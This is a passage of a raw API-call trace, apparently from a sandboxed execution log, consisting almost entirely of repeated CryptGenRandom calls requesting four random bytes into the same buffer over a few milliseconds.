dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: 